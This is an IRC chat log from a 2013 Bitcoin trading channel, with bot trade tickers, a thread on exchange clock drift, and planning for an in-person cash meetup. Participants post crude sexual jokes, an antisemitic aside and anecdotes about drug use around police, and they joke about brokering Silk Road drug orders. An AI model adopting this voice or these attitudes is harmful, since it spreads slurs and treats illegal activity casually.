05 23:23:06 what are you using, a Palm Pilot? May 05 23:23:09 lol May 05 23:23:25 hahaha May 05 23:23:37 stat relative to other data inside seems to be okay. whole thing including http headers has offset May 05 23:23:40 is is secreted in a slave girl's arse? May 05 23:24:05 you can get the receiver on a usb stick, and it will fit even there May 05 23:24:17 asciilifeform the only stuff like that i've seen is roughly larger than a server blade May 05 23:24:21 and has to be so and so emplaced etc May 05 23:24:46 jurov that'd be normal as the outer layer of servers ashould be more or less on normal time May 05 23:25:04 the industrial products, sure. but with a consumer stick the functionality is the same, minus the steel case. May 05 23:25:14 the girl will have to bend her arse towards the sky when you want to sync May 05 23:25:25 asciilifeform well provider i use didn;'t have your stick and i didn't press the issue May 05 23:25:37 and of course you maintain a local server, that the radio signal can only over-ride by a second or so delta either way May 05 23:25:57 2013-05-05 21:09:15,655 [mpex]:DEBUG:Response headers: [('Date', ['Sun, 05 May 2013 19:09:06 GMT']), << this is HTTP Date header from outer layer I guess May 05 23:26:05 and it's 10 sec off, too May 05 23:26:09 yeah May 05 23:26:43 was this progressive and only now noticed or did it just happen ?! May 05 23:26:43 or buy a cesium timepiece yourself (4 figures USD on ebay) or a rhubidium one if you're a cheapskate. May 05 23:26:43 [BTCTC] [ASICMINER-PT] 1 @ 1.23 BTC [-] May 05 23:26:46 [BTCTC] [ASICMINER-PT] 1 @ 1.226 BTC [-] May 05 23:26:58 asciilifeform i can't get radioactive material into that space ;/ May 05 23:27:04 neither is radioactive May 05 23:27:18 http://en.wikipedia.org/wiki/Cesium_clock May 05 23:27:25 its decay innit ? May 05 23:27:27 only stable isotopes are used in a clock May 05 23:27:32 nothing to do with decay May 05 23:27:47 [BTCTC] [TAT.ASICMINER] 44 @ 0.01255 = 0.5522 BTC [+] May 05 23:27:59 microwave resonance of the element in question May 05 23:28:10 a ok May 05 23:28:11 a clock based on nuclear decay would suck May 05 23:28:14 aaanyways. May 05 23:28:43 jurov so basically, the situation here is that the stat time and the tx time inside the stat is consistent May 05 23:28:43 seriously, even the dinkiest fm radio station has a rhubidium clock (to help stay in its purchased frequency band.) May 05 23:28:49 mpex can afford it May 05 23:28:54 but this not necessarily consistent with other time signals such as http headers May 05 23:28:56 is this correct ? May 05 23:29:59 now it looks like both stat time, tx time and http headers are ~10 sec off May 05 23:30:01 http://www.quickmeme.com/meme/3u99f2/ May 05 23:31:02 mpex is creating its own timezone. May 05 23:31:45 btw, the extent to which btc users can be fucked with through ntp spoofing is non-zero and quite interesting to contemplate. May 05 23:32:16 somebody ought to make a quick buck marketing usb rhubidium clocks to "supernode" fellows May 05 23:32:49 theres market for at least one May 05 23:33:01 on May 2 and before there was only 1 sec difference May 05 23:33:18 searchign for the point where it went bad... May 05 23:33:36 just dont fuck up the matrix May 05 23:35:44 how could i fuck it? i just can claim "this is the point when matrix took over" May 05 23:35:46 o May 05 23:35:54 someone called for cream with cherry on top https://bitcointalk.org/index.php?topic=196150.0 May 05 23:36:05 also, I should note that, AFAIK, neither GPS, nor GLONASS, nor Beidou use crypto authentication for the time signal (or the coordinates!) so you could still be spoofed, if someone were interested. May 05 23:36:14 hence buying your own clock. May 05 23:37:11 anyway should be all synced May 05 23:37:31 genjix: Tihan is a manipulative sociopath. May 05 23:37:34 lolz May 05 23:37:41 asciilifeform yeah and yeah. May 05 23:38:02 these are the sorts of things nobody knows about. mpex too paranoid to allow ntp, mtgox buys more ram. May 05 23:39:59 >>Oh, and next time you trash and break a Segway in Vienna that Alex paid for because some fat girl offers you a hug...DONT RUN AWAY AND LEAVE THE SEGWAY IN THE STREET!!!!!! (true story for whoever wants to know. Roger, Erik and myself were there) May 05 23:40:04 lol wtf May 05 23:41:24 wtf ?! May 05 23:41:42 follow last retardcointalk url May 05 23:42:17 The site had been losing money for months May 05 23:42:18 ha! May 05 23:42:24 who was contradicting me last week ? May 05 23:42:27 asciilifeform: iirc iranians spoofed btc already and captured a drone May 05 23:42:40 jurov: yes, exactly May 05 23:42:42 mircea_popescu tbh could be just some bull. May 05 23:42:54 *spoofed gps , not btc :) May 05 23:43:05 jurov: the funniest part is that the drone could have been using the military (authenticated) channel, but wasn't - because of "lowest bidder" hardware on board. May 05 23:43:27 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] May 05 23:43:40 asciilifeform the dirty secret there is that the military chan is tyoo slow. May 05 23:43:55 jurov: all the Iranians had to do was broadcast the coordinates of the U.S. airbase the drone was to return to. May 05 23:48:15 https://bitcointalk.org/index.php?topic=196150.msg2039674#msg2039674 May 05 23:48:22 all bitcoin has is one fat girl and a broken segway. May 05 23:58:07 [BTCTC] [GSDPT] 3 @ 0.003199 = 0.0096 BTC [+] May 05 23:58:59 [BTCTC] [GSDPT] 97 @ 0.0032 = 0.3104 BTC [+] May 06 00:17:26 lawl mircea_popescu https://bitcointalk.org/index.php?topic=196189.msg2040113#msg2040113 May 06 00:17:42 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19 BTC [-] May 06 00:18:02 lol May 06 00:19:50 git status May 06 00:19:56 oh derp May 06 00:20:56 benkay were you asking me about the previous one ? May 06 00:25:36 https://bitcointalk.org/index.php?topic=186185.msg2037118#msg2037118 it reminds him of the movie May 06 00:25:38 dun dun dun May 06 00:25:38 MOAR https://bitcointalk.org/index.php?topic=194494.0 May 06 00:26:07 [HAVELOCK] [KCIM] 2 @ 1.465 = 2.93 BTC [+] May 06 00:27:17 don't know what you're talking about, mircea_popescu May 06 00:28:09 mpoe-pr was telling the previous new-exchange-idiot to pack it May 06 00:28:17 and you were asking me whay or something May 06 00:28:54 no, i accidentally terminaled into x-chat May 06 00:29:03 >>bashed in x-chat May 06 00:29:30 are you referencing a conversation from a few days back? May 06 00:31:53 how long should I air dry computers that have been washed May 06 00:32:18 wat May 06 00:32:29 did you use detergent? May 06 00:32:42 no, just rain water May 06 00:32:49 ah i would wash them again then May 06 00:32:50 dub a week May 06 00:33:28 transporting command center to new dubhouse, had kayak on roof and water tracked along roof racks May 06 00:33:48 helpfully washing a laptop and mining rig May 06 00:35:50 lol May 06 00:36:18 you aid computer not laptop. May 06 00:36:28 a laptop is basically neversafe to use again, unless you take it apart. May 06 00:38:41 well the saving grace is its battery is completely dead, only works with power attached so hopefully no residual power to short anything May 06 00:40:34 I am just speculating but it seems to me that Mircea isn't really a racist even though he could have conveyed his point more gently by considering the history of racism and ethnic discrimination in the U.S. and the fact that Bitcoin is popular within the same demographic of people that will actually read him, despite his Armenian descent he could have been more considerate of other nations May 06 00:40:36 o.o May 06 00:42:29 now that ppl accually read you, you must watch your mouth May 06 00:42:41 but why am i armenian May 06 00:42:45 he thinks im maddox ?! May 06 00:43:06 make "im better than your wife" page May 06 00:44:47 lol May 06 00:44:50 tyhat may be dangerousd May 06 00:51:02 !ticker b asicminer-pt May 06 00:51:03 The vision of Christ that thou dost see ... is my vision's greatest enemy. May 06 00:51:53 !ticker btctc asicminer-pt May 06 00:51:55 [BTCT:ASICMINER-PT] 1D: 1.12 / 1.20323 / 1.268999 (303 shares, 364.6 BTC), 7D: 1.12 / 1.25659 / 1.32475 (1650 shares, 2073.4 BTC), 30D: 0.6269 / 1.05905 / 1.75 (6980 shares, 7392.2 BTC) May 06 00:52:13 btctctfctctc worst brand ever May 06 00:52:49 you can use bt for short May 06 01:05:07 [HAVELOCK] [KCIM] 1 @ 1.465 BTC [+] May 06 01:25:55 [BTCTC] [TAT.ASICMINER] 10 @ 0.01255 = 0.1255 BTC [+] May 06 01:26:07 [HAVELOCK] [SDICE] 8 @ 0.3194 = 2.5552 BTC [+] May 06 01:28:40 [BTCTC] [ASICMINER-PT] 3 @ 1.21001 = 3.63 BTC [-] May 06 01:32:13 [BTCTC] [TAT.ASICMINER] 5 @ 0.01255 = 0.0628 BTC [+] May 06 01:37:21 [BTCTC] [ASICMINER-PT] 1 @ 1.2 BTC [-] May 06 01:38:26 [MPEX] [S.MPOE] 14100 @ 0.00070862 = 9.9915 BTC [-] May 06 01:53:54 mircea_popescu: May 06 02:05:58 sup everyone May 06 02:07:39 heya May 06 02:13:14 not much May 06 02:15:33 >Small issues friend. We are attempting to make our exchange very reputable. I don't see value this year, but 10 years down the road when crypto-currencies are truly the trend. Our vision is to build a long lasting product for our market - We need a good team to do that. May 06 02:15:34 omg! May 06 02:15:39 >I should have been clear on the aspect of the design and basic functionality - I think bitstamp is a clean interface but you are right, they have their flaws. Engine wise, I'd look towards the process MtGox is taking on and the partnerships they have forged with various companies to increase their survival (see: Prolexic partnership). May 06 02:15:43 he said survival. May 06 02:16:33 so dear assets ppl, help me see what classics i've missed. May 06 02:16:40 played the entire heroes of might and magic series, May 06 02:16:43 played most ultima May 06 02:16:45 played gothic May 06 02:16:52 played wizardry May 06 02:17:20 baldur's gate and all the stuff on that engine May 06 02:20:34 [BTCTC] [ASICMINER-PT] 1 @ 1.2 BTC [-] May 06 02:24:12 ;;calc 43.48 / 1.60 May 06 02:24:13 27.175 May 06 02:24:28 ;;calc 43.40 / 1.60 May 06 02:24:28 27.125 May 06 02:24:33 ;;calc 43.20 / 1.60 May 06 02:24:33 27 May 06 02:25:10 mircea_popescu you haven't played vidya games until you've played mega man 2 May 06 02:25:14 jkjk May 06 02:26:27 any JS devs here May 06 02:29:01 The bitcoin blocks are flying right now. May 06 02:34:38 [BTCTC] [PAJKA.BOND] 2 @ 0.1081 = 0.2162 BTC [-] May 06 02:36:20 ;;calc .25*46.48 May 06 02:36:20 11.62 May 06 02:36:27 ;;calc .75*46.48 May 06 02:36:28 34.86 May 06 02:36:40 ;;calc 55 - 34.86 May 06 02:36:40 20.14 May 06 02:37:42 mircea_popescu are you still looking for classics? May 06 02:38:31 sure May 06 02:38:51 DWARF FORTRESS May 06 02:39:08 [BTCTC] [ASICMINER-PT] 2 @ 1.22 = 2.44 BTC [+] May 06 02:39:08 ;;bc,stats May 06 02:39:11 Current Blocks: 234719 | Current Difficulty: 1.0076292883418716E7 | Next Difficulty At Block: 235871 | Next Difficulty In: 1152 blocks | Next Difficulty In About: 6 days, 23 hours, 33 minutes, and 49 seconds | Next Difficulty Estimate: 10449088.1411 | Estimated Percent Change: 3.69973 May 06 02:39:22 um May 06 02:39:52 i nev er played that one ?! May 06 02:40:30 lol what's this, 2006 rogue ? May 06 03:34:21 ;;nethash May 06 03:34:22 77399.968439 May 06 03:37:06 in happier news my new local chinese takeout has a street fighter 2 machine May 06 03:41:25 [BTCTC] [TAT.ASICMINER] 15 @ 0.01255 = 0.1883 BTC [+] May 06 03:49:59 hey all, if you are interested May 06 03:50:08 check out my new blog post at blog.btcshares.com May 06 03:50:23 work in progress May 06 03:50:28 can't get comments to work right yet May 06 03:55:20 [BTCTC] [TAT.ASICMINER] 4 @ 0.01255 = 0.0502 BTC [+] May 06 03:57:17 truff1es: harsh is fine May 06 03:58:03 as far as content, it WILL be stuff related to bitcoin, my views on the current news of bitcoin, my ideas about future projects... May 06 03:58:15 personal views on bitcoin related things, i guess to summarize May 06 03:58:33 So this is a rough draft first start May 06 03:58:59 mainly trying to show the history of community based exchanges and how this could work for bitcoin May 06 03:59:04 I might change the them May 06 03:59:05 theme May 06 03:59:10 love some feedback on that May 06 03:59:16 dont hold your breath May 06 03:59:31 hahaha May 06 03:59:34 fontas said all cryptocurrency will die off May 06 03:59:36 yeah, that was due to the copy and paste May 06 03:59:44 oh well if fontas said it... May 06 03:59:46 he has spoken [silence] May 06 03:59:49 mircea_popescu: why don't you go in #bitcoin-otc anymore? May 06 03:59:53 lol May 06 04:00:26 truff1es: i think i'll edit the formatting on the copy and pasted parts...i'll see if there is a different way to show that they are not my words May 06 04:05:26 truff1es: you are welcome to fact check May 06 04:05:35 though most of it is not very controversial May 06 04:05:36 [MPEX] [S.MPOE] 4514 @ 0.00070983 = 3.2042 BTC [+] May 06 04:05:38 [MPEX] [S.MPOE] 5786 @ 0.00071081 = 4.1127 BTC [+] May 06 04:06:07 It was not questionable enough for me to bother with citations May 06 04:06:17 though i may be a bit more academically rigorous in the futuer May 06 04:09:44 yes of course May 06 04:09:49 but they rely on banking system May 06 04:09:56 hence id's and aml and kyc and etc etc May 06 04:10:10 if this reaches critical mass we can bypass all of that May 06 04:12:21 slight change to annoy the glaring copy paste May 06 04:13:46 ugh i wish i could make it commentable by anyone May 06 04:14:09 wp install is 2min May 06 04:16:03 [BTCTC] [ASICMINER-PT] 1 @ 1.222 BTC [+] May 06 04:16:45 There are currently 0 bitcoins offered at or under 50.0 USD, worth 0.0 USD in total. | Data vintage: 0.0041 seconds May 06 04:16:45 There are currently 168769.47 bitcoins demanded at or over 50.0 USD, worth 13655295.8024 USD in total. | Data vintage: 0.7688 seconds May 06 04:16:54 There are currently 38558.078 bitcoins demanded at or over 100.0 USD, worth 4173894.5056 USD in total. | Data vintage: 9.3899 seconds May 06 04:17:00 There are currently 111318.88 bitcoins offered at or under 200.0 USD, worth 16734739.414 USD in total. | Data vintage: 15.3346 seconds May 06 04:17:07 There are currently 65599.796 bitcoins offered at or under 150.0 USD, worth 8940923.01739 USD in total. | Data vintage: 22.5084 seconds May 06 04:17:52 !asks 1 May 06 04:19:49 [BTCTC] [ASICMINER-PT] 1 @ 1.2 BTC [-] May 06 04:19:59 [BTCTC] [ASICMINER-PT] 3 @ 1.2 = 3.6 BTC [-] May 06 04:21:14 so, content wise: ___ May 06 04:21:22 color-scheme: ____ May 06 04:21:22 [MPEX] [S.MPOE] 13500 @ 0.00070897 = 9.5711 BTC [-] May 06 04:21:27 [MPEX] [S.MPOE] 8400 @ 0.00070862 = 5.9524 BTC [-] May 06 04:21:30 just so you know, i don't really care about the second one May 06 04:21:30 [MPEX] [S.MPOE] 900 @ 0.00069899 = 0.6291 BTC [-] May 06 04:21:50 i'll see if i can do something else May 06 04:21:54 no May 06 04:21:57 not at all May 06 04:22:03 i will hold no coins or fiat May 06 04:22:09 all clearing is done p2p May 06 04:22:13 just info May 06 04:22:19 [BTCTC] [MININGCO.ETF] 1 @ 0.699 BTC [+] May 06 04:22:20 and consensus building May 06 04:22:41 if other cities want to set up an open air exchange, they could all ideally figure out where and when using app May 06 04:23:04 geolocate is not a "requirement" in fact, the whole site will have as few requirements as possible May 06 04:23:24 hmmm, post 2 i suppose May 06 04:23:38 basically, i have a bunch of people meeting me in union square tomorrow May 06 04:23:45 they are all there to trade bitcoins May 06 04:24:15 so for now (unless i get this site up in less than 18 hours) they will need to walk around to each other person, or yell it out May 06 04:24:35 they will have to calculate how much they are buying and selling May 06 04:24:49 they will not know necessarily what the other 2 people bought or sold for May 06 04:24:55 they could know May 06 04:24:59 but may not May 06 04:25:11 so project buttonwood is aiming to solve those issues May 06 04:25:30 ideally you can just easily see an order book and either place an order or take an order already listed May 06 04:25:34 with cash settlement on the spot May 06 04:25:41 f u btct.co May 06 04:25:46 y ur api dum May 06 04:25:49 (hence GPS, if you aren't there i can't take your order huh?) May 06 04:26:37 IRC still doesn't maintain a best bid and ask May 06 04:26:47 though i think i will link this to an IRC channel as well May 06 04:26:59 also IRC won't have a one button solution to taking an order May 06 04:27:06 but, you are on the right track somewhat May 06 04:27:24 think a chatroom/messageboard where all messages are orders and they are sorted and displayed a certain way May 06 04:27:58 for example: 1btc for $115 is not useful May 06 04:28:04 but that is how prices are shown May 06 04:28:08 [HAVELOCK] [VTX] 2 @ 0.4663 = 0.9326 BTC [+] May 06 04:28:14 but for cash, $20 for .243 bitcoin is useful May 06 04:28:21 since i have a $20 bill May 06 04:28:50 i think i will denominate trades in $10 bill increments...not sure, $20 is more common to have, but also bigger size May 06 04:29:17 I added some pics of possible looks at the bottom May 06 04:29:24 i mean...you could use change if you want May 06 04:29:29 but do you really want to? May 06 04:29:55 bitcoin is easily split up into whatever amount you need, dollars aren't May 06 04:30:32 anyways, the web app will be a facilitator of trade May 06 04:30:36 mjr___ i just finished your blog post, sounds really interesting, best of luck with the project! May 06 04:30:43 thanks toffoo May 06 04:30:49 ;;ticker May 06 04:30:50 BTCUSD ticker | Best bid: 115.78021, Best ask: 115.99697, Bid-ask spread: 0.21676, Last trade: 115.99997, 24 hour volume: 84071.33502587, 24 hour low: 107.00000, 24 hour high: 118.85000, 24 hour vwap: 113.57700 May 06 04:31:07 [HAVELOCK] [VTX] 1 @ 0.4663 BTC [+] May 06 04:31:34 again, the app is not necessary...you are free to show up (the fact i would say that is only because people don't understand) and do whatever you want May 06 04:31:46 you are by default free to do whatever you want May 06 04:32:09 if the app makes your life easier (address prepopulated into webwallet/coinapult) etc May 06 04:32:15 then enjoy it May 06 04:32:45 once you get this first level idea to spread, then brokers could deal cross exchange May 06 04:33:20 integrate with #bitcoin-otc May 06 04:33:21 etc May 06 04:33:40 I guess I will write a follow-up to specify how i see it playing out May 06 04:34:22 [MPEX] [S.MPOE] 13750 @ 0.00071081 = 9.7736 BTC [+] May 06 05:07:54 [19:35:11] getting past the hurdle of explaining it to the average joe will be biggest imo May 06 05:08:04 Error: "price" is not a valid command. May 06 05:08:19 [BTCTC] [ASICMINER-PT] 3 @ 1.2 = 3.6 BTC [-] May 06 05:08:54 [BTCTC] [PAJKA.BOND] 20 @ 0.1081 = 2.162 BTC [-] May 06 05:09:02 I just got burned by china May 06 05:09:47 goddamn lazy ass motherfuckers May 06 05:10:06 [BTCTC] [B.YABMC] 3 @ 0.01555 = 0.0467 BTC [+] May 06 05:10:11 [BTCTC] [B.YABMC] 13 @ 0.01599 = 0.2079 BTC [+] May 06 05:10:21 [BTCTC] [B.YABMC] 49 @ 0.015998 = 0.7839 BTC [+] May 06 05:10:31 [BTCTC] [B.YABMC] 35 @ 0.015999 = 0.56 BTC [+] May 06 05:11:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.01255 BTC [+] May 06 05:11:25 http://blog.btcshares.com/follow-up May 06 05:11:31 truff1es: there is the follow up piece May 06 05:11:34 a lot less formal May 06 05:11:40 this is practice to the former's theory May 06 05:17:41 [BTCTC] [TAT.ASICMINER] 5 @ 0.01255 = 0.0628 BTC [+] May 06 05:21:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.01255 BTC [+] May 06 05:23:06 this would be part of the app, you can link a btc address and the app will do a mouseover with info from blockexplorer or bitcoininfo May 06 05:23:11 we are talking specs right now May 06 05:23:20 not what it actually does, which is say hello to bob and show the time May 06 05:24:02 if you choose to link an address you can load that address with coins so people know you have coins for sale and are not just bullshitting May 06 05:24:12 physical? May 06 05:24:20 i mean... May 06 05:24:37 compare and contrast scenario 1 and 2...my web app can't physically protect you May 06 05:24:45 BUT May 06 05:25:15 compared to localbitcoins which is "meet me in this alley over here" (joking but it is let me meet this guy i don't know) May 06 05:25:36 would you really feel like walking into a group of people and saying give me the cash and then running? May 06 05:25:55 i would say LESS likely than in a one on one scenario May 06 05:25:56 yes May 06 05:25:57 true May 06 05:26:03 because of risk/reward May 06 05:26:18 your reward in this scenario is small, with very high risks May 06 05:26:25 i picked a public park for a reason May 06 05:26:28 police presence May 06 05:27:09 how does that work? May 06 05:27:20 you grab the other party and run away with them? May 06 05:27:31 dub: LOL May 06 05:27:57 you would have to walk up to a group of people...get them all to hand over cash or bitcoins...all while attracting no attention May 06 05:28:03 and again, you would be in the middle of a groiup May 06 05:28:19 and if you have seen parks May 06 05:28:29 they are big grassy areas...the cops are usually on the sidewalks around the park May 06 05:28:35 I think its a good place if there are police around May 06 05:28:44 in fact, in union square the subway station is below the park and has its own precinct May 06 05:28:50 but fine, let's say starbucks May 06 05:28:58 you would walk into starbucks, and do armed robbery May 06 05:29:00 ok... May 06 05:29:05 your point being that banks will never work? May 06 05:29:31 ... May 06 05:29:40 so how would you do a transaction now May 06 05:29:42 gox? May 06 05:29:47 this isn't for people who have gox May 06 05:29:52 this is for people who don't want to use gox May 06 05:29:58 or for people who want to get a better rate than gox May 06 05:30:02 or sell for more than gox offers May 06 05:30:14 its localbitcoins with much better features May 06 05:30:21 and again, i am not selling it May 06 05:30:32 i dn't really care, if it is valuable it succeeds, if not, it doesn't May 06 05:30:52 point is there are 10-15 people meeting up in union square tomorrow May 06 05:30:56 its a lot safer to have a larger group than two involved too May 06 05:31:00 in a group of 40 it was unanimous May 06 05:31:05 [BTCTC] [TAT.ASICMINER] 22 @ 0.01255 = 0.2761 BTC [+] May 06 05:31:08 dub: exactly the point of this May 06 05:31:13 groups are self-policing May 06 05:31:36 and in an animalistic sense, they offer protection from lone attackers May 06 05:31:43 pretty hard to controll a group that size, coerce them into giving up keys etc, in a busy public area with LE around May 06 05:31:47 police will be like "ooo whats this suspicious group of people, they seem to be handling cash amongs each other and typing on their phones, must be some sort of interweb drugs, lets bust em all" May 06 05:31:49 yes May 06 05:32:00 kakobrekla; that is the balancing act May 06 05:32:01 a lot harder than robbing a bank May 06 05:32:14 kakobrekla: not too shady for cops to care, but cops still there if needed May 06 05:32:25 i think the key to that is sitting down May 06 05:32:40 maybe if you all did some kind of dance as well May 06 05:32:40 you look like a group of friends if you are sitting, AND someone can't run as easily May 06 05:32:49 dub: no thanks...i have my limits May 06 05:32:51 lol dub May 06 05:32:57 the police will assume you are a bunch of assholes from the internet May 06 05:33:02 :D May 06 05:33:09 or wear LARP costumes May 06 05:33:11 oh noes! its the silk road! May 06 05:33:21 dub: ok, that has some potential May 06 05:33:30 IRL silk road May 06 05:33:36 best business idea ever? May 06 05:33:40 oh wait, its called drug dealing May 06 05:33:55 but but! May 06 05:34:00 you could be a public broker May 06 05:34:05 take cash and orders May 06 05:34:07 hmmm May 06 05:34:10 true May 06 05:34:15 order on SR with btc May 06 05:34:19 like those ebay brick and mortars May 06 05:34:22 delivery straight to their homes May 06 05:34:40 hmmmm, what would my liability even be? May 06 05:34:46 i never touched cash or drugs May 06 05:34:46 I think a bunch of suits standing around takign pictures of each others phones is not going to raise to much suspicion May 06 05:35:07 dub: i agree, but also, even better if we can do it without QR codes May 06 05:35:12 "ill pay 20 to take a pic of your phone" May 06 05:35:17 hahaha May 06 05:35:22 "no ill give you 25" May 06 05:35:24 that is how we sneak under the radar May 06 05:35:33 pics of our phones are very valuable May 06 05:35:54 yes officer, i told him he could take a pic of my phone for $22 May 06 05:36:08 thank god this is all being logged May 06 05:36:17 for future generations i mean May 06 05:36:32 hehe May 06 05:36:41 we have a duty to our descendants May 06 05:36:44 use RKOI as cover ,all bring blinged out phone cases and wear rolex May 06 05:37:00 that is actually a great point dub May 06 05:37:15 if people actually dressed nicely, the cops would probably never even think to bother them May 06 05:37:24 wear four rolex added douchefactor May 06 05:37:36 i'm telling you...there are bars in nyc that are known coke dens May 06 05:37:39 just don't invite genjix May 06 05:37:44 that have never had a cop inside in ten years May 06 05:38:04 because drug use is not a problem if you have a white collar job May 06 05:38:26 my friend, and this is not a joke, this actually happened, walked into a police station May 06 05:38:28 yep, tis the same everywhere May 06 05:38:30 to file a report on something else May 06 05:38:35 they asked for his ID May 06 05:38:41 for the record, mjr has white collar job. May 06 05:38:41 he pulled it out with a bag of coke May 06 05:38:50 and handed it to the cop on the counter May 06 05:38:59 the cop, and i am not shitting you, turned his head May 06 05:39:04 and kinda grunted May 06 05:39:11 my friend apologized and picked up his coke May 06 05:39:22 the cop turns back and says now what is this report you want to file May 06 05:39:33 that is the world we live in May 06 05:39:58 I did almost the same thing May 06 05:40:02 cops could give two shits about a guy causing no trouble who looks decently respectable May 06 05:40:27 you could probably do it in front of them and they would say "really? you can't use the bathroom like everyone else?" May 06 05:40:28 cop is talkign to me outside a party about whats going on inside, reach in back pocket for cigarette May 06 05:40:37 put joint in my mouth and go to light it May 06 05:40:52 LOL May 06 05:41:07 i'm guessing story doesn't end with handcuffs May 06 05:41:09 he's like 'uhh' I go oops, put it away and we keep talking May 06 05:41:24 millions of stories just like that May 06 05:41:29 most cops are cool if you aren't a dick May 06 05:41:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.01255 BTC [+] May 06 05:41:55 if you look vagrant, or sketchy, or maybe arabic nowadays (sucks but true) they will probably harrass you May 06 05:42:52 actually, i take that back, if you look RELIGIOUSLY arabic they will bother you, rolex and nice suit, go on your way, sir May 06 05:43:08 in fact for pretty much everyone, nice suit is all it takes to become invisible to them May 06 05:44:04 anyways, that was kinda off topic, point is, look like normal humans, don't act crazy, cops will protect and not harrass May 06 05:44:30 and more to the point, that has nothing to do with the idea, the idea ASSUMES that you are already meeting up in a group May 06 05:44:39 because that is ALREADY what is happening tomorrow May 06 05:45:32 some massive buying started May 06 05:45:59 oh wait May 06 05:46:06 im on a short chart May 06 05:46:22 nvm, off i go, nite May 06 05:46:36 http://i.minus.com/ibzpzLmlNNsY4S.gif May 06 05:46:52 mjr you are right about drug use and white collar jobs..i know for a fact my jobs have suspected me but i never heard anything nor had any tests May 06 05:46:58 same with coworkers May 06 05:48:08 dude I have a bunch of drug priors, never been a problem getting employed May 06 05:48:14 yep May 06 05:48:23 i have no record May 06 05:48:39 not chicken farms either, IBM, other multinationals May 06 05:49:03 truff1es: i agree that you are taking some risks, the point is that you can minimize those risks if you WANT to take part in an IRL transaction, that is what this tries to do May 06 05:49:03 miami is a lot like NYC except we invented the cocaine and business mix lol May 06 05:49:34 Whoever thinks coke is not like it was in the 80s in Miami is sorely mistaken. May 06 05:49:40 Its even more mad. May 06 05:50:11 truff1es: but you also take risks with btc-exchanges or otc, it is a different set of risks, but you could have your exchange shut down (bitfloor, bitcoin-central, etc) May 06 05:50:25 you could have your money stuck in limbo for a week+ May 06 05:50:30 you could have a scammer on OTC May 06 05:52:48 yes May 06 05:52:52 21 mio btc May 06 05:53:20 [MPEX] [S.MPOE] 1257 @ 0.00070101 = 0.8812 BTC [-] May 06 05:53:21 [MPEX] [S.MPOE] 12100 @ 0.00070023 = 8.4728 BTC [-] May 06 05:53:23 [MPEX] [S.MPOE] 6308 @ 0.00069899 = 4.4092 BTC [-] May 06 05:53:25 [MPEX] [S.MPOE] 3023 @ 0.00069757 = 2.1088 BTC [-] May 06 05:57:09 [HAVELOCK] [VTX] 5 @ 0.47529999 = 2.3765 BTC [+] May 06 06:03:42 kakobrekla: NICE May 06 06:03:44 lol May 06 06:03:52 although... May 06 06:04:00 theoretically he could trade back and forth May 06 06:04:07 buying and selling 21 million bitcoins May 06 06:04:21 i thought it was per trade May 06 06:04:45 truff1es: to be serious, since i am not brokering, escrowing, backing or in any way touching your money or your bitcoins, i could care less how much you choose to transact with someone else May 06 06:05:20 as far as taxes, regulations, that is your responsibility to report, pay or whatever May 06 06:05:28 does craigslist limit transactions? May 06 06:05:42 or are they liable for people paying taxes? May 06 06:05:48 think of this as craigslist May 06 06:06:21 a site that makes mpex look like it was designed by johnny ives May 06 06:06:35 sir johnny ives May 06 06:06:45 lest i be too familiar May 06 06:07:02 kakobrekla: i added some comments to the follow up post to reference the skateboard comment May 06 06:08:28 haha mjr___, skateboards up this motherfucker ya know May 06 06:09:14 maybe ill send one to taaki, as fan May 06 06:10:10 fontas: 122 aaahhh it's party time May 06 06:12:26 lol@tiberiusuv May 06 06:12:29 haha May 06 06:12:33 good old tiberiusiv May 06 06:12:37 the one man trollbox May 06 06:13:11 fork! https://bitcointalk.org/index.php?topic=196138.0 May 06 06:15:01 ;;next May 06 06:15:01 targets: 127, 130-140, 160, 190 | support: 116.5 | resistance: 120 | very bullish on Chinese interest in Bitcoin | #bitcoin [Mon, 06 May 2013 02:54:46 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | 20 minutes and 7 seconds ago May 06 06:15:10 not sure if china news is good or bad May 06 06:18:10 it kinda did May 06 06:20:35 mjr___ May 06 06:20:54 just find a solution to quickly find the other party in the grup of 30-50 ppl May 06 06:21:00 or whatever May 06 06:21:25 off i go now srs. May 06 06:21:50 I'll be the one wearing a propeller hat May 06 06:22:30 also inb4 some fucking loser shows up in a guy fawkes mask May 06 06:30:37 [MPEX] [S.MPOE] 3714 @ 0.00071081 = 2.6399 BTC [+] May 06 06:30:39 [MPEX] [S.MPOE] 4200 @ 0.00071162 = 2.9888 BTC [+] May 06 06:30:43 [MPEX] [S.MPOE] 167 @ 0.00071587 = 0.1196 BTC [+] May 06 06:41:18 lol skateboard up in this motherfucker May 06 06:42:09 [HAVELOCK] [SDICE] 6 @ 0.2660005 = 1.596 BTC [-] **** BEGIN LOGGING AT Mon May 6 14:30:15 2013 May 06 14:30:55 ;;ticker May 06 14:30:56 BTCUSD ticker | Best bid: 124.00000, Best ask: 124.11990, Bid-ask spread: 0.11990, Last trade: 124.00000, 24 hour volume: 80762.90996442, 24 hour low: 108.00000, 24 hour high: 124.70000, 24 hour vwap: 118.05663 May 06 14:36:19 [BTCTC] [COGNITIVE] 1 @ 0.238979 BTC [-] May 06 14:36:48 [MPEX] [S.MPOE] 2250 @ 0.00069814 = 1.5708 BTC [+] May 06 14:36:49 [MPEX] [S.MPOE] 839 @ 0.00070254 = 0.5894 BTC [+] May 06 14:36:50 [MPEX] [S.MPOE] 9861 @ 0.00070882 = 6.9897 BTC [+] May 06 14:41:18 mjr___ it's too wordy. you have good points, but make the case in the first paragraph and then go into the historic anecdote May 06 14:42:13 ah thanks May 06 14:42:26 yeah, i am trying to play up the historic homage to NYSE May 06 14:42:48 and i also find it ironic that they block people from following the path of the institutions that they venerate May 06 14:42:52 make a 100 word or less kickass vp May 06 14:43:03 vp? May 06 14:43:03 then you can go into all the stuff as a girder. May 06 14:43:08 value proposition May 06 14:43:12 and lead with it May 06 14:43:14 ah, i see May 06 14:43:17 i will go back and edit May 06 14:43:23 i think there will be a forbes piece though May 06 14:43:42 i mean, i appreciate reading history but i may be the only usurer in the world that does May 06 14:43:44 my friend put me in contact with someone there, so hopefully we get some coverage May 06 14:43:47 maybe some jew somewhere. May 06 14:43:51 hahaha May 06 14:46:07 [BTCTC] [COGNITIVE] 